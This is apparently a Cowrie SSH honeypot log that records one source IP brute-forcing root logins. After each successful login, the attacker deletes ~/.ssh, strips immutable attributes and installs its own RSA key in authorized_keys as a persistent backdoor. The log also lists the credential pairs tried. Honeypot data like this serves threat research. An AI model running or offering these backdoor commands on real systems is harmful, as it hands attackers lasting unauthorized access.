{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T15:56:00.759637Z","src_ip":"212.227.235.229","session":"5799d50b3cc7"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T15:56:01.526846Z","src_ip":"212.227.235.229","session":"5799d50b3cc7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.8","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:56:01.527868Z","src_ip":"212.227.235.229","session":"5799d50b3cc7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39095,"dst_ip":"1.2.3.4","dst_port":22,"session":"320f937a1bd9","protocol":"ssh","message":"New connection: 212.227.235.229:39095 (1.2.3.4:22) [session: 320f937a1bd9]","sensor":"my-vps","timestamp":"2025-08-28T15:56:01.785697Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T15:56:01.786617Z","src_ip":"212.227.235.229","session":"320f937a1bd9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T15:56:02.047720Z","src_ip":"212.227.235.229","session":"320f937a1bd9"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T15:56:03.880586Z","src_ip":"212.227.235.229","session":"320f937a1bd9"}
{"eventid":"cowrie.session.closed","duration":"3.4","message":"Connection lost after 3.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:56:05.144742Z","src_ip":"212.227.235.229","session":"320f937a1bd9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39534,"dst_ip":"1.2.3.4","dst_port":22,"session":"a78d8400f03b","protocol":"ssh","message":"New connection: 212.227.235.229:39534 (1.2.3.4:22) [session: a78d8400f03b]","sensor":"my-vps","timestamp":"2025-08-28T15:56:06.418327Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T15:56:06.419362Z","src_ip":"212.227.235.229","session":"a78d8400f03b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T15:56:06.682945Z","src_ip":"212.227.235.229","session":"a78d8400f03b"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T15:56:07.777473Z","src_ip":"212.227.235.229","session":"a78d8400f03b"}
{"eventid":"cowrie.session.closed","duration":"10.3","message":"Connection lost after 10.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:56:08.033838Z","src_ip":"212.227.235.229","session":"5799d50b3cc7"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:56:08.042582Z","src_ip":"212.227.235.229","session":"a78d8400f03b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52470,"dst_ip":"1.2.3.4","dst_port":22,"session":"73d32501c116","protocol":"ssh","message":"New connection: 212.227.235.229:52470 (1.2.3.4:22) [session: 73d32501c116]","sensor":"my-vps","timestamp":"2025-08-28T15:56:27.087119Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T15:56:27.088028Z","src_ip":"212.227.235.229","session":"73d32501c116"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T15:56:27.402091Z","src_ip":"212.227.235.229","session":"73d32501c116"}
{"eventid":"cowrie.login.success","username":"root","password":"1321","message":"login attempt [root/1321] succeeded","sensor":"my-vps","timestamp":"2025-08-28T15:56:28.698166Z","src_ip":"212.227.235.229","session":"73d32501c116"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T15:56:29.343883Z","src_ip":"212.227.235.229","session":"73d32501c116"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T15:56:29.344730Z","src_ip":"212.227.235.229","session":"73d32501c116"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T15:56:29.346269Z","src_ip":"212.227.235.229","session":"73d32501c116"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:56:29.661924Z","src_ip":"212.227.235.229","session":"73d32501c116"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T15:56:30.355222Z","src_ip":"212.227.235.229","session":"73d32501c116"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T15:56:30.355999Z","src_ip":"212.227.235.229","session":"73d32501c116"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T15:56:30.674273Z","src_ip":"212.227.235.229","session":"73d32501c116"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:56:30.675314Z","src_ip":"212.227.235.229","session":"73d32501c116"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48968,"dst_ip":"1.2.3.4","dst_port":22,"session":"f471972309a3","protocol":"ssh","message":"New connection: 212.227.235.229:48968 (1.2.3.4:22) [session: f471972309a3]","sensor":"my-vps","timestamp":"2025-08-28T15:56:30.979927Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T15:56:30.980908Z","src_ip":"212.227.235.229","session":"f471972309a3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T15:56:31.286528Z","src_ip":"212.227.235.229","session":"f471972309a3"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T15:56:32.550840Z","src_ip":"212.227.235.229","session":"f471972309a3"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:56:33.860163Z","src_ip":"212.227.235.229","session":"f471972309a3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48974,"dst_ip":"1.2.3.4","dst_port":22,"session":"bd2622400a62","protocol":"ssh","message":"New connection: 212.227.235.229:48974 (1.2.3.4:22) [session: bd2622400a62]","sensor":"my-vps","timestamp":"2025-08-28T15:56:34.165620Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T15:56:34.166312Z","src_ip":"212.227.235.229","session":"bd2622400a62"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T15:56:34.475470Z","src_ip":"212.227.235.229","session":"bd2622400a62"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T15:56:35.744774Z","src_ip":"212.227.235.229","session":"bd2622400a62"}
{"eventid":"cowrie.session.closed","duration":"9.0","message":"Connection lost after 9.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:56:36.051914Z","src_ip":"212.227.235.229","session":"73d32501c116"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:56:36.053251Z","src_ip":"212.227.235.229","session":"bd2622400a62"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50390,"dst_ip":"1.2.3.4","dst_port":22,"session":"cdd831b4402a","protocol":"ssh","message":"New connection: 212.227.235.229:50390 (1.2.3.4:22) [session: cdd831b4402a]","sensor":"my-vps","timestamp":"2025-08-28T15:56:44.696313Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T15:56:44.697276Z","src_ip":"212.227.235.229","session":"cdd831b4402a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T15:56:44.919824Z","src_ip":"212.227.235.229","session":"cdd831b4402a"}
{"eventid":"cowrie.login.success","username":"root","password":"asu","message":"login attempt [root/asu] succeeded","sensor":"my-vps","timestamp":"2025-08-28T15:56:45.852762Z","src_ip":"212.227.235.229","session":"cdd831b4402a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T15:56:46.316262Z","src_ip":"212.227.235.229","session":"cdd831b4402a"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T15:56:46.317120Z","src_ip":"212.227.235.229","session":"cdd831b4402a"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T15:56:46.318420Z","src_ip":"212.227.235.229","session":"cdd831b4402a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:56:46.542449Z","src_ip":"212.227.235.229","session":"cdd831b4402a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T15:56:47.436528Z","src_ip":"212.227.235.229","session":"cdd831b4402a"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T15:56:47.437358Z","src_ip":"212.227.235.229","session":"cdd831b4402a"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T15:56:47.662121Z","src_ip":"212.227.235.229","session":"cdd831b4402a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:56:47.663146Z","src_ip":"212.227.235.229","session":"cdd831b4402a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60360,"dst_ip":"1.2.3.4","dst_port":22,"session":"9857d3ea539c","protocol":"ssh","message":"New connection: 212.227.235.229:60360 (1.2.3.4:22) [session: 9857d3ea539c]","sensor":"my-vps","timestamp":"2025-08-28T15:56:47.864555Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T15:56:47.865468Z","src_ip":"212.227.235.229","session":"9857d3ea539c"}
